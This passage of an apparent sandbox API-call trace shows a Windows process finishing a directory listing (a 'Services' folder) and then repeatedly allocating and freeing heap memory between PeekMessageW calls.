ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.943] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0198.943] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 0 [0198.943] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0198.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x371e70 | out: hHeap=0x2c0000) returned 1 [0198.944] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0198.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31ba80 [0198.944] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0198.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0198.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0198.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0198.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0198.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.988] HeapFree (in: 